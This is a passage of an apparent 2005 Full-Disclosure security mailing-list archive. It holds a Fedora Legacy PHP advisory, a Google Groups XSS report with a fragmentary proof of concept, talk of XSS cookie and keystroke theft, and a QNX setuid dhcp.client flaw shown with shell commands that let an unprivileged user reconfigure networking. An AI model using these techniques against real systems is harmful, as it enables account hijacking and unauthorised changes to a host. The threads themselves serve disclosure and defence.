http://download.fedoralegacy.org/redhat/7.3/updates/i386/php-devel-4.1.2-7.3.18.legacy.i386.rpm http://download.fedoralegacy.org/redhat/7.3/updates/i386/php-imap-4.1.2-7.3.18.legacy.i386.rpm http://download.fedoralegacy.org/redhat/7.3/updates/i386/php-ldap-4.1.2-7.3.18.legacy.i386.rpm http://download.fedoralegacy.org/redhat/7.3/updates/i386/php-manual-4.1.2-7.3.18.legacy.i386.rpm http://download.fedoralegacy.org/redhat/7.3/updates/i386/php-mysql-4.1.2-7.3.18.legacy.i386.rpm http://download.fedoralegacy.org/redhat/7.3/updates/i386/php-odbc-4.1.2-7.3.18.legacy.i386.rpm http://download.fedoralegacy.org/redhat/7.3/updates/i386/php-pgsql-4.1.2-7.3.18.legacy.i386.rpm http://download.fedoralegacy.org/redhat/7.3/updates/i386/php-snmp-4.1.2-7.3.18.legacy.i386.rpm Red Hat Linux 9: SRPM: http://download.fedoralegacy.org/redhat/9/updates/SRPMS/php-4.2.2-17.17.legacy.src.rpm i386: http://download.fedoralegacy.org/redhat/9/updates/i386/php-4.2.2-17.17.legacy.i386.rpm http://download.fedoralegacy.org/redhat/9/updates/i386/php-devel-4.2.2-17.17.legacy.i386.rpm http://download.fedoralegacy.org/redhat/9/updates/i386/php-imap-4.2.2-17.17.legacy.i386.rpm http://download.fedoralegacy.org/redhat/9/updates/i386/php-ldap-4.2.2-17.17.legacy.i386.rpm http://download.fedoralegacy.org/redhat/9/updates/i386/php-manual-4.2.2-17.17.legacy.i386.rpm http://download.fedoralegacy.org/redhat/9/updates/i386/php-mysql-4.2.2-17.17.legacy.i386.rpm http://download.fedoralegacy.org/redhat/9/updates/i386/php-odbc-4.2.2-17.17.legacy.i386.rpm http://download.fedoralegacy.org/redhat/9/updates/i386/php-pgsql-4.2.2-17.17.legacy.i386.rpm http://download.fedoralegacy.org/redhat/9/updates/i386/php-snmp-4.2.2-17.17.legacy.i386.rpm Fedora Core 1: SRPM: http://download.fedoralegacy.org/fedora/1/updates/SRPMS/php-4.3.11-1.fc1.3.legacy.src.rpm i386: http://download.fedoralegacy.org/fedora/1/updates/i386/php-4.3.11-1.fc1.3.legacy.i386.rpm http://download.fedoralegacy.org/fedora/1/updates/i386/php-devel-4.3.11-1.fc1.3.legacy.i386.rpm http://download.fedoralegacy.org/fedora/1/updates/i386/php-domxml-4.3.11-1.fc1.3.legacy.i386.rpm http://download.fedoralegacy.org/fedora/1/updates/i386/php-imap-4.3.11-1.fc1.3.legacy.i386.rpm http://download.fedoralegacy.org/fedora/1/updates/i386/php-ldap-4.3.11-1.fc1.3.legacy.i386.rpm http://download.fedoralegacy.org/fedora/1/updates/i386/php-mbstring-4.3.11-1.fc1.3.legacy.i386.rpm http://download.fedoralegacy.org/fedora/1/updates/i386/php-mysql-4.3.11-1.fc1.3.legacy.i386.rpm http://download.fedoralegacy.org/fedora/1/updates/i386/php-odbc-4.3.11-1.fc1.3.legacy.i386.rpm http://download.fedoralegacy.org/fedora/1/updates/i386/php-pgsql-4.3.11-1.fc1.3.legacy.i386.rpm http://download.fedoralegacy.org/fedora/1/updates/i386/php-snmp-4.3.11-1.fc1.3.legacy.i386.rpm http://download.fedoralegacy.org/fedora/1/updates/i386/php-xmlrpc-4.3.11-1.fc1.3.legacy.i386.rpm Fedora Core 2: SRPM: http://download.fedoralegacy.org/fedora/2/updates/SRPMS/php-4.3.11-1.fc2.4.legacy.src.rpm i386: http://download.fedoralegacy.org/fedora/2/updates/i386/php-4.3.11-1.fc2.4.legacy.i386.rpm http://download.fedoralegacy.org/fedora/2/updates/i386/php-devel-4.3.11-1.fc2.4.legacy.i386.rpm http://download.fedoralegacy.org/fedora/2/updates/i386/php-domxml-4.3.11-1.fc2.4.legacy.i386.rpm http://download.fedoralegacy.org/fedora/2/updates/i386/php-imap-4.3.11-1.fc2.4.legacy.i386.rpm http://download.fedoralegacy.org/fedora/2/updates/i386/php-ldap-4.3.11-1.fc2.4.legacy.i386.rpm http://download.fedoralegacy.org/fedora/2/updates/i386/php-mbstring-4.3.11-1.fc2.4.legacy.i386.rpm http://download.fedoralegacy.org/fedora/2/updates/i386/php-mysql-4.3.11-1.fc2.4.legacy.i386.rpm http://download.fedoralegacy.org/fedora/2/updates/i386/php-odbc-4.3.11-1.fc2.4.legacy.i386.rpm http://download.fedoralegacy.org/fedora/2/updates/i386/php-pear-4.3.11-1.fc2.4.legacy.i386.rpm http://download.fedoralegacy.org/fedora/2/updates/i386/php-pgsql-4.3.11-1.fc2.4.legacy.i386.rpm http://download.fedoralegacy.org/fedora/2/updates/i386/php-snmp-4.3.11-1.fc2.4.legacy.i386.rpm http://download.fedoralegacy.org/fedora/2/updates/i386/php-xmlrpc-4.3.11-1.fc2.4.legacy.i386.rpm 7. Verification: SHA1 sum Package Name --------------------------------------------------------------------- 8bdf500386f11c6484c04361095061cce6c5c5f8 redhat/7.3/updates/i386/php-4.1.2-7.3.18.legacy.i386.rpm 592c870e99523279267a0daea98c7dc08b09e5ca redhat/7.3/updates/i386/php-devel-4.1.2-7.3.18.legacy.i386.rpm 9f84a76296d88673ba8354f416a6ee75b86afb3f redhat/7.3/updates/i386/php-imap-4.1.2-7.3.18.legacy.i386.rpm 8c4b7136f2cac5f8eea394db819e0f67a973e4ff redhat/7.3/updates/i386/php-ldap-4.1.2-7.3.18.legacy.i386.rpm d579f333822efd11fb2fc1364d2b9218bd3547a9 redhat/7.3/updates/i386/php-manual-4.1.2-7.3.18.legacy.i386.rpm 50ec5b4419f70839b5c0b328a605189137477d12 redhat/7.3/updates/i386/php-mysql-4.1.2-7.3.18.legacy.i386.rpm a73300b91e8ac8aee1792f5ec0975fb312b7f780 redhat/7.3/updates/i386/php-odbc-4.1.2-7.3.18.legacy.i386.rpm af7de72af9756d6085d255544de389eb8f355c39 redhat/7.3/updates/i386/php-pgsql-4.1.2-7.3.18.legacy.i386.rpm d96277ec0aa9d37af3372eedb0868249ca96ff51 redhat/7.3/updates/i386/php-snmp-4.1.2-7.3.18.legacy.i386.rpm 8a03b8a7832aba6baf825ec64778f4a321707405 redhat/7.3/updates/SRPMS/php-4.1.2-7.3.18.legacy.src.rpm a3770f044b61275fe671c2e41452fdc3556cd68b redhat/9/updates/i386/php-4.2.2-17.17.legacy.i386.rpm 282e79a54800f0f078702983a54391ddf97637eb redhat/9/updates/i386/php-devel-4.2.2-17.17.legacy.i386.rpm 08cf701a137ed486294e7768d3f1464d40ee72b0 redhat/9/updates/i386/php-imap-4.2.2-17.17.legacy.i386.rpm 1b882b5ad1933a567eeb03e9ea40f59a124bfd4f redhat/9/updates/i386/php-ldap-4.2.2-17.17.legacy.i386.rpm 11ce31a48256813fd0b61975b4189f9053ea0b37 redhat/9/updates/i386/php-manual-4.2.2-17.17.legacy.i386.rpm a23a1e0fc5f254f0b3284c20f35736e9c0cb70f4 redhat/9/updates/i386/php-mysql-4.2.2-17.17.legacy.i386.rpm 11204a5ad7b12dc80a021ebf23acaf5c791c518d redhat/9/updates/i386/php-odbc-4.2.2-17.17.legacy.i386.rpm 791b822042fed0cd3936e0148a51a215db3d7f78 redhat/9/updates/i386/php-pgsql-4.2.2-17.17.legacy.i386.rpm b93fc807a74caefeb1f0d848b4a6f2c268ec1508 redhat/9/updates/i386/php-snmp-4.2.2-17.17.legacy.i386.rpm 5df94b0dda6f043a8312a03be66689c2abd373ab redhat/9/updates/SRPMS/php-4.2.2-17.17.legacy.src.rpm cd04cc6c329e18a9c0c989cdb9a5fcdc9b6712c8 fedora/1/updates/i386/php-4.3.11-1.fc1.3.legacy.i386.rpm bdb82f6017f088488443cec5f97650aa172714bd fedora/1/updates/i386/php-devel-4.3.11-1.fc1.3.legacy.i386.rpm 5921f184247991ddac4b398a617abea8768cd9d5 fedora/1/updates/i386/php-domxml-4.3.11-1.fc1.3.legacy.i386.rpm b38b1aabdcee19a8764b9156ffbd4a7fd15c5345 fedora/1/updates/i386/php-imap-4.3.11-1.fc1.3.legacy.i386.rpm ecb2bfd639fe1e44a389e2527babbd912279d6ad fedora/1/updates/i386/php-ldap-4.3.11-1.fc1.3.legacy.i386.rpm 3bd193c7d75216cbe34cee7c637be042b2197693 fedora/1/updates/i386/php-mbstring-4.3.11-1.fc1.3.legacy.i386.rpm 0883a4ef7c03d8faebc90ed0f4a138e1f9b64c9f fedora/1/updates/i386/php-mysql-4.3.11-1.fc1.3.legacy.i386.rpm 62017bd8700dcaceb2280443abb3e6fd17e9458e fedora/1/updates/i386/php-odbc-4.3.11-1.fc1.3.legacy.i386.rpm c9a90440e780eb1420100ed8b0e28d92ddea0295 fedora/1/updates/i386/php-pgsql-4.3.11-1.fc1.3.legacy.i386.rpm ef627102ded443de2e78c33a29f76c6066f7bf5a fedora/1/updates/i386/php-snmp-4.3.11-1.fc1.3.legacy.i386.rpm 38da5e66ead97e573a7105ad4a62a14c75763268 fedora/1/updates/i386/php-xmlrpc-4.3.11-1.fc1.3.legacy.i386.rpm d2b93da45a735956e980e8a5401c4b171644794a fedora/1/updates/SRPMS/php-4.3.11-1.fc1.3.legacy.src.rpm edce472b6a404a45bb0187ed2058929b51850423 fedora/2/updates/i386/php-4.3.11-1.fc2.4.legacy.i386.rpm 5f55d05ec4dbbbd6717a14f495bfe9948bec3837 fedora/2/updates/i386/php-devel-4.3.11-1.fc2.4.legacy.i386.rpm d308529686de245b33057c4ce1a7e0435ba748e6 fedora/2/updates/i386/php-domxml-4.3.11-1.fc2.4.legacy.i386.rpm a85ba72dbcf8357c63bd7ddd71a8e7b1e270a0d0 fedora/2/updates/i386/php-imap-4.3.11-1.fc2.4.legacy.i386.rpm 8856c97f65e6dfdf5241faa5294a9a8883de049b fedora/2/updates/i386/php-ldap-4.3.11-1.fc2.4.legacy.i386.rpm f7d1159e5756ba33282920d0923bcd338306a2c8 fedora/2/updates/i386/php-mbstring-4.3.11-1.fc2.4.legacy.i386.rpm 24d23bd41dc5c3233019a86a988057dfa8fd3576 fedora/2/updates/i386/php-mysql-4.3.11-1.fc2.4.legacy.i386.rpm 618b32b0c28b71755c8f487b035649e44213b2cf fedora/2/updates/i386/php-odbc-4.3.11-1.fc2.4.legacy.i386.rpm cf728abb52acc26f2f6d33dbb5135fdbd2ec4df0 fedora/2/updates/i386/php-pear-4.3.11-1.fc2.4.legacy.i386.rpm fe3a23d81b92930426f7dd3a5b687ef979d8a3b9 fedora/2/updates/i386/php-pgsql-4.3.11-1.fc2.4.legacy.i386.rpm 771c5041ed29045e4de59bcacbc0c640247c80e7 fedora/2/updates/i386/php-snmp-4.3.11-1.fc2.4.legacy.i386.rpm 2962cc479b53c181dd67fdd4008ee904d81e71ac fedora/2/updates/i386/php-xmlrpc-4.3.11-1.fc2.4.legacy.i386.rpm 2c6d2007423a9334a22451521a742ca942677c57 fedora/2/updates/SRPMS/php-4.3.11-1.fc2.4.legacy.src.rpm These packages are GPG signed by Fedora Legacy for security. Our key is available from http://www.fedoralegacy.org/about/security.php You can verify each package with the following command: rpm --checksig -v If you only wish to verify that each package has not been corrupted or tampered with, examine only the sha1sum with the following command: sha1sum 8. References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2498 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3390 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3389 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3388 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3353 9. Contact: The Fedora Legacy security contact is . More project details at http://www.fedoralegacy.org --------------------------------------------------------------------- -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 189 bytes Desc: OpenPGP digital signature Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20051202/a6d999ea/attachment.bin From anonymous.squirrel at gmail.com Sat Dec 3 01:40:19 2005 From: anonymous.squirrel at gmail.com (Anonymous Squirrel) Date: Fri, 2 Dec 2005 20:40:19 -0500 Subject: [Full-disclosure] Most common keystroke loggers? In-Reply-To: <4391A7D0.28815.3212F664@gmail.com> References: <43918DF9.9012.31AE0659@gmail.com> <20051202233928.GB21813@foofus.net> <4391A7D0.28815.3212F664@gmail.com> Message-ID: <7f26752b0512021740x82fda52ja3d4368be0f25744@mail.gmail.com> This thread is fascinating...but a bit misguided. Consider that somone's home computer in the US is used for their finances (e.g. Quicken), tax returns, and other applications. Think of the wealth of identity-related information in those applications. If the computer is compromised, the identity-related information can be stolen without regard to tokens, biometrics, separate USB hash creators, or any other device. * if the home computer is 0wned, it's game over *. Now if the computer is not 0wned, then the other controls can be very useful in verifying identities and mitigating the risk of fraudulent transactions. I suggest we re-evaluate the issue _assuming_the_computer_is_not_compromised. -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20051202/3c33fe8c/attachment.html From waldoalvarez00 at gmail.com Sat Dec 3 03:18:01 2005 From: waldoalvarez00 at gmail.com (wac) Date: Fri, 2 Dec 2005 22:18:01 -0500 Subject: [Full-disclosure] Window's O/S In-Reply-To: <20051124110713.78764.qmail@web51905.mail.yahoo.com> References: <20051124110713.78764.qmail@web51905.mail.yahoo.com> Message-ID: Hi: I guess that is the remaining of an old IE bug that opened notepad.exe on the desktop. I remember it quite well, it is archived somewhere for sure. On 11/24/05, jacob jango wrote: > > Not sure if you guys are aware of this issue windows XP...!! > > > create an folder on deskop and name it as "notepad". > open internet explorer > go to view > source code > this will open the > contents of notepad folder....!! > > > > ------------------------------ > Yahoo! Music Unlimited - Access over 1 million songs. Try it free. > > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > > -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20051202/bdcdc754/attachment.html From hendo at hendohome.com Sat Dec 3 03:44:16 2005 From: hendo at hendohome.com (Dennis Henderson) Date: Fri, 2 Dec 2005 21:44:16 -0600 Subject: [Full-disclosure] FW: [MailServer Notification] Your .zip file hasbeen blocked from entering the ScanSoft email environment. In-Reply-To: <20051202201848.2FD46231@lists.grok.org.uk> Message-ID: > Action taken on message: > The attachment citibank-vkl.zip matched file blocking > settings. ScanMail took the action: Quarantined. The > attachment was quarantined to C:\Program > Files\Trend\Smex\Alert\citibank-vkl4390aa8826.zip_. > The Nuance email system prohibits the transmission of file > attachments with .zip extensions. Please rename your file to > filename.zzp and resend to ensure delivery. Trend doesn't care what the extension is.. It looks in the header to identify the file... Sounds like they don't understand how their AV works... > > Thank you for your cooperation. > > > > From kf_lists at digitalmunition.com Sat Dec 3 04:26:15 2005 From: kf_lists at digitalmunition.com (KF (lists)) Date: Fri, 02 Dec 2005 23:26:15 -0500 Subject: [Full-disclosure] DMA[2005-1202a] - 'sobexsrv - Scripting/Secure OBEX Server format string vulnerability' Message-ID: <43911E67.4080002@digitalmunition.com> -------------- next part -------------- An embedded and charset-unspecified text was scrubbed... Name: DMA[2005-1202a].txt Url: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20051202/cd9af87d/attachment.txt -------------- next part -------------- A non-text attachment was scrubbed... Name: sobexsrv.pl Type: application/x-perl Size: 1648 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20051202/cd9af87d/attachment.bin From xploitable at gmail.com Sat Dec 3 04:36:47 2005 From: xploitable at gmail.com (n3td3v) Date: Sat, 3 Dec 2005 04:36:47 +0000 Subject: [Full-disclosure] Google is vulnerable from XSS attack Message-ID: <4b6ee9310512022036j71d64dcbk7c79aef077ad8e66@mail.gmail.com> Vendor: Google Service: Groups Issue: XSS in pending message page Description: The http://groups.google.com/group/n3td3v/pendmsg page is vulnerable from cross-site-scripting attack. This allows a malicious user to take the owner or moderator cookie from the user. This can then be used to access a groups administrative controls. Scenario: If a group is moderating messages before allowing a post, a malicious user can send a message to the vulnerable pendmsg page. If a group is unmoderated, but Google's anti-spam technology suspects a message is from a known spammer or phisher, the message goes to the pendmsg page. A malicious spammer or phisher can send a message to the vulnerable pendmsg page. Reproduction: Setup a test group and send a carefully crafted script to the pendmsg page. Proof of concept: Remarks: This is my second Google disclosure in under a year. That makes two vulnerabilities for Google I have discovered. Can I make it a third? Maybe you can come back next year to find out. ;-) First disclosure: December 18th 2004 Second disclosure: December 3rd 2005 Credit: n3td3v From very at unprivate.com Sat Dec 3 04:48:54 2005 From: very at unprivate.com (php0t) Date: Sat, 3 Dec 2005 05:48:54 +0100 Subject: [Full-disclosure] Google is vulnerable from XSS attack References: <4b6ee9310512022036j71d64dcbk7c79aef077ad8e66@mail.gmail.com> Message-ID: <027101c5f7c4$dd2ea700$0200a8c0@DORKA> >Proof of concept: href="http://www.google.com/url?sa=D&q=http://www.google.com? > "> > Remarks: This is my second Google disclosure in under a year. That > makes two vulnerabilities for Google I have discovered. > Credit: n3td3v wall ... bad... head .. hurt. ouch. From infosecbofh at gmail.com Sat Dec 3 09:55:30 2005 From: infosecbofh at gmail.com (InfoSecBOFH) Date: Sat, 3 Dec 2005 01:55:30 -0800 Subject: [Full-disclosure] Google is vulnerable from XSS attack In-Reply-To: <027101c5f7c4$dd2ea700$0200a8c0@DORKA> References: <4b6ee9310512022036j71d64dcbk7c79aef077ad8e66@mail.gmail.com> <027101c5f7c4$dd2ea700$0200a8c0@DORKA> Message-ID: <2be58a30512030155q5a37a4c3m1a6834e1434ac932@mail.gmail.com> So how about a real world attack scenario for this. This is one of the lamest vulns I have ever seen. > > Remarks: This is my second Google disclosure in under a year. That > > makes two vulnerabilities for Google I have discovered. Oh great, more useless XSS vulns. Sigh... perhaps one day you will learn to actually come up with something remote and useful... From infosecbofh at gmail.com Sat Dec 3 09:57:02 2005 From: infosecbofh at gmail.com (InfoSecBOFH) Date: Sat, 3 Dec 2005 01:57:02 -0800 Subject: [Full-disclosure] Help with reporting In-Reply-To: <43908345.8050907@kc.rr.com> References: <200512021729.jB2HTe77029023@pinky.pczone-clan.nl> <43908345.8050907@kc.rr.com> Message-ID: <2be58a30512030157j1185fe6fh8e87d3f7cd390b2d@mail.gmail.com> Well said! On 12/2/05, Matthew Murphy wrote: > -----BEGIN PGP SIGNED MESSAGE----- > Hash: RIPEMD160 > > Jeroen van Meeuwen wrote: > > Or you could just report the bug to the list... > > I would *NOT* encourage reporting the vulnerability straight to the > list. The advice I'd offer the OP is to report it individually, or use > a coordinator or one of the services like VulnHelp that offer > researchers assistance in vulnerability reporting. > > Truth-be-told, I'd encourage the use of coordinators if you have any > hope for a resolution of a PHP security issue. I find that the project > seldom takes vulnerability reports seriously, preferring instead to > ridicule researchers who contribute bug reports. > > In addition to the lack of professionalism commonly found amongst team > members, the response process is poorly structured. The project has no > advisory mechanism in place to deal specifically with security issues. > The team often does not credit reporters of security vulnerabilities or > other bugs in its software, if they ever get fixed. The supposed > "process" is so ad hoc that even calling it a process is probably > undeserved praise. > > Put simply: PHP's security processes lag far behind even its commercial > competitors -- PHP is the Oracle of open-source and worse. Dealing with > them makes Microsoft and kin look like a cakewalk. > > - -- > "Social Darwinism: Try to make something idiot-proof, > nature will provide you with a better idiot." > > -- Michael Holstein > > -----BEGIN PGP SIGNATURE----- > Version: GnuPG v1.4.2 (MingW32) > Comment: Using GnuPG with Thunderbird - http://enigmail.mozdev.org > > iD8DBQFDkINFfp4vUrVETTgRA1qMAKDLDNGB18dQ2TKCWhz4scL0O4FPxwCgzhpS > r7RRj23hMLkXOcogHm9p958= > =iKsq > -----END PGP SIGNATURE----- > > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > > > From i.m.crazy.frog at gmail.com Sat Dec 3 14:10:23 2005 From: i.m.crazy.frog at gmail.com (crazy frog crazy frog) Date: Sat, 3 Dec 2005 06:10:23 -0800 Subject: [Full-disclosure] Window's O/S In-Reply-To: References: <20051124110713.78764.qmail@web51905.mail.yahoo.com> Message-ID: <41011d980512030610r47d439f0yed6a1461e39e4459@mail.gmail.com> yes, i checked on win2000 pro. On 12/2/05, wac wrote: > Hi: > > I guess that is the remaining of an old IE bug that opened notepad.exe on > the desktop. I remember it quite well, it is archived somewhere for sure. > > On 11/24/05, jacob jango wrote: > > > > > > Not sure if you guys are aware of this issue windows XP...!! > > > > > > create an folder on deskop and name it as "notepad". > > open internet explorer > go to view > source code > this will open the > contents of notepad folder....!! > > > > > > > > ________________________________ > Yahoo! Music Unlimited - Access over 1 million songs. Try it free. > > > > > > _______________________________________________ > > Full-Disclosure - We believe in it. > > Charter: > http://lists.grok.org.uk/full-disclosure-charter.html > > Hosted and sponsored by Secunia - http://secunia.com/ > > > > > > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: > http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > > -- ting ding ting ding ting ding ting ding ting ding ding i m crazy frog :) "oh yeah oh yeah... another wannabe, in hackerland!!!" From anti-cybercrime at phteam.org Sat Dec 3 07:42:51 2005 From: anti-cybercrime at phteam.org (anti-cybercrime at phteam.org) Date: Fri, 2 Dec 2005 23:42:51 -0800 Subject: [Full-disclosure] Philippine Network Security Fund Message-ID: <1133595771.43914c7bc6867@webmail.phteam.org> We are giving away limited edition t-shirts as early Christmas gifts to our fellow network security enthusiasts. The design can be viewed at phteam.org/wendel/finalTshirt.jpg Merry Christmas! From ivan.arce at coresecurity.com Fri Dec 2 21:34:08 2005 From: ivan.arce at coresecurity.com (Ivan Arce) Date: Fri, 02 Dec 2005 18:34:08 -0300 Subject: [Full-disclosure] Software Firewalls for Windows In-Reply-To: <20051202123832.ad0i28vgn1cg4wko@www.onestepsolutions.net> References: <20051202123832.ad0i28vgn1cg4wko@www.onestepsolutions.net> Message-ID: <4390BDD0.2050803@coresecurity.com> You may want to test Core FORCE as well. It's still in early beta stage, free under an apache 2.0 license and let's you configure firewall rules, filesystem and registry access permissions on a per application basis. it uses a Windows port of OpenBSD's PF as its firewall engine. http://force.coresecurity.com -ivan Paul Stephens wrote: > Hi list, I've been a firm advocate of Sygate Pro for some time but as Symantec > has bought and canned it I'm wondering what you guys would recommend as a > replacement. > >>From the limited testing I've done I'm leaning toward Ghostwall for XP64 & > Outpost for 32bit machines. > > Any suggestions welcomed. > > Regards > > Paul Stephens > (Proprietor - OneStep Solutions) > http://www.onestepsolutions.net/ > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ From Chris at thebillguy.com Sat Dec 3 17:40:35 2005 From: Chris at thebillguy.com (Chris Locke) Date: Sat, 3 Dec 2005 11:40:35 -0600 Subject: [Full-disclosure] Philippine Network Security Fund Message-ID: <9A126678CF5FB94BBD7009BFAD86D010097460@tbgsvr01.TBG.local> Hahaha that is fuckin sweet -----Original Message----- From: full-disclosure-bounces at lists.grok.org.uk [mailto:full-disclosure-bounces at lists.grok.org.uk] Sent: Saturday, December 03, 2005 1:43 AM Subject: [Full-disclosure] Philippine Network Security Fund We are giving away limited edition t-shirts as early Christmas gifts to our fellow network security enthusiasts. The design can be viewed at phteam.org/wendel/finalTshirt.jpg Merry Christmas! _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- No virus found in this incoming message. Checked by AVG Free Edition. Version: 7.1.362 / Virus Database: 267.13.11/191 - Release Date: 12/2/2005 -- No virus found in this outgoing message. Checked by AVG Free Edition. Version: 7.1.362 / Virus Database: 267.13.11/191 - Release Date: 12/2/2005 From lms at fe.up.pt Sat Dec 3 17:33:39 2005 From: lms at fe.up.pt (lms at fe.up.pt) Date: Sat, 03 Dec 2005 17:33:39 +0000 Subject: [Full-disclosure] QNX 4.25 suided dhcp.client binary Message-ID: <20051203173339.scxughxz40gogc0w@webmail.fe.up.pt> Hello all, I recently got a QNX 4.25 vmware image and i found that the dhcp.client shipped with it is suided. This obviously enables a normal user to control the NIC's configuration and produce some other attacks (eg: if the system has some services which depend on 'host/ip based' authentication [NFS,NIS,rlogin, etc]). Some vmware screenshots are available at: http://lms.ispgaya.pt/goodies/qnx/ I havent got access to other QNX installations so, allthough the person who gave me the image said the binary wasnt changed, can anybody else confirm this? Best regards, +--------------------------------- | Lu?s Miguel Ferreira da Silva | Unidade de Qualidade e Seguran?a | Centro de Inform?tica | Professor Correia Ara?jo | Faculdade de Engenharia da | Universidade do Porto -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-keys Size: 1657 bytes Desc: PGP Public Key Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20051203/2546d413/attachment.bin From ktriv3di at msn.com Sat Dec 3 19:45:47 2005 From: ktriv3di at msn.com (Hochin Chen) Date: Sat, 3 Dec 2005 11:45:47 -0800 Subject: [Full-disclosure] Re: List of security incidents Message-ID: I remembering seeing a post on this topic few months back...anyone has the link? Looking for list of security incidents in media over last few years for a presentation Thanks -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20051203/b3715f02/attachment.html From xploitable at gmail.com Sat Dec 3 20:14:03 2005 From: xploitable at gmail.com (n3td3v) Date: Sat, 3 Dec 2005 20:14:03 +0000 Subject: [Full-disclosure] Google is vulnerable from XSS attack In-Reply-To: <2be58a30512030155q5a37a4c3m1a6834e1434ac932@mail.gmail.com> References: <4b6ee9310512022036j71d64dcbk7c79aef077ad8e66@mail.gmail.com> <027101c5f7c4$dd2ea700$0200a8c0@DORKA> <2be58a30512030155q5a37a4c3m1a6834e1434ac932@mail.gmail.com> Message-ID: <4b6ee9310512031214g57b54c15x94cd9a674fcc13ed@mail.gmail.com> The capabilities of a XSS flaw are endless. You know what you're talking about, right? Maybe not. ;-) On 12/3/05, InfoSecBOFH wrote: > So how about a real world attack scenario for this. This is one of > the lamest vulns I have ever seen. > > Oh great, more useless XSS vulns. Sigh... perhaps one day you will > learn to actually come up with something remote and useful... From ddrinnon at cdor.net Sat Dec 3 21:23:00 2005 From: ddrinnon at cdor.net (Dan Drinnon) Date: Sat, 3 Dec 2005 16:23:00 -0500 Subject: [Full-disclosure] RE: QNX 4.25 suided dhcp.client binary In-Reply-To: <20051203173339.scxughxz40gogc0w@webmail.fe.up.pt> Message-ID: Confirmed on an AudioRequest Pro music server running QNX 4.25. A non-privileged user can run dhcp.client and change the IP address to DHCP. A non-privileged user cannot change the IP address to a static using ifconfig: While telneted to the server as a non-privileged user... [mp3 at arq]$ifconfig en1 10.0.1.1 netmask 255.255.255.0 broadcast 10.0.1.255 ifconfig: ioctl (SIOCDIFADDR): permission denied [mp3 at arq]$./dhcp.client -i en1 [mp3 at arq]$ Then I lost my connection (obviously!) I only have one server running QNX, it would be interesting to see if a non-privileged user could run dhcp.client and configure another QNX node like this: [mp3 at arq]$./dhcp.client -i //20/en1 (configure the server on node 20) QNX 4.25 is an old version, but it is still used on a lot of appliance-type systems. As far as the AudioRequest goes, it is a closed system that does not allow remote terminal sessions unless you can hack into it and change things. Request dropped QNX for Linux with the latest software releases. -----Original Message----- From: lms at fe.up.pt [mailto:lms at fe.up.pt] Sent: Saturday, December 03, 2005 12:34 PM To: bugtraq at securityfocus.com; Vuln at frsirt.com; full-disclosure at lists.grok.org.uk Subject: QNX 4.25 suided dhcp.client binary Hello all, I recently got a QNX 4.25 vmware image and i found that the dhcp.client shipped with it is suided. This obviously enables a normal user to control the NIC's configuration and produce some other attacks (eg: if the system has some services which depend on 'host/ip based' authentication [NFS,NIS,rlogin, etc]). Some vmware screenshots are available at: http://lms.ispgaya.pt/goodies/qnx/ I havent got access to other QNX installations so, allthough the person who gave me the image said the binary wasnt changed, can anybody else confirm this? Best regards, +--------------------------------- | Lu?s Miguel Ferreira da Silva | Unidade de Qualidade e Seguran?a | Centro de Inform?tica | Professor Correia Ara?jo | Faculdade de Engenharia da | Universidade do Porto From bugtraq at cgisecurity.net Sat Dec 3 21:20:12 2005 From: bugtraq at cgisecurity.net (bugtraq at cgisecurity.net) Date: Sat, 3 Dec 2005 16:20:12 -0500 (EST) Subject: [Full-disclosure] Google is vulnerable from XSS attack In-Reply-To: <2be58a30512030155q5a37a4c3m1a6834e1434ac932@mail.gmail.com> Message-ID: <20051203212012.21398.qmail@cgisecurity.net> > So how about a real world attack scenario for this. This is one of > the lamest vulns I have ever seen. Until about a year ago, I'd have to agree with you. A lot of uses for XSS have been researched in the last year including a few new ways to use it make it 'useful'. Not only can you do standard cookie hijacking with XSS, but combined with browser flaws XSS 'could' (in certain situations) be used to help portscan and possible exploit(carry exploit payloads) a backend network behind a firewall (to the user visiting the XSS'd link), as well as gather Basic Auth credentials(or other headers) via XST attacks. Jeremiah Grossman presented at blackhat and showed that it's possible to capture keystrokes from a user that has visited a 'XSS'd' link as well as have bidirectional communication with them. Functionality such as xmlhttp can greatly expand the usefulness of Cross Site Scripting. The Cross Site Scripting FAQ http://www.cgisecurity.com/articles/xss-faq.shtml Cross-Site Tracing (XST) (Official Mirror) http://www.cgisecurity.com/lib/WH-WhitePaper_XST_ebook.pdf AJAX (Asynchronous Javascript and XML) Links http://www.cgisecurity.com/ajax/ Jeremiah's blackhat talk http://www.blackhat.com/presentations/bh-jp-05/bh-jp-05-grossman.pdf XSS is 'starting' to get fairly useful. Regards, - admin at cgisecurity.com http://www.cgisecurity.com/ (Web Security News, and More!) http://www.cgisecurity.com/index.rss (Web Security News RSS Feed) From kf_lists at digitalmunition.com Sun Dec 4 00:58:33 2005 From: kf_lists at digitalmunition.com (KF (lists)) Date: Sat, 03 Dec 2005 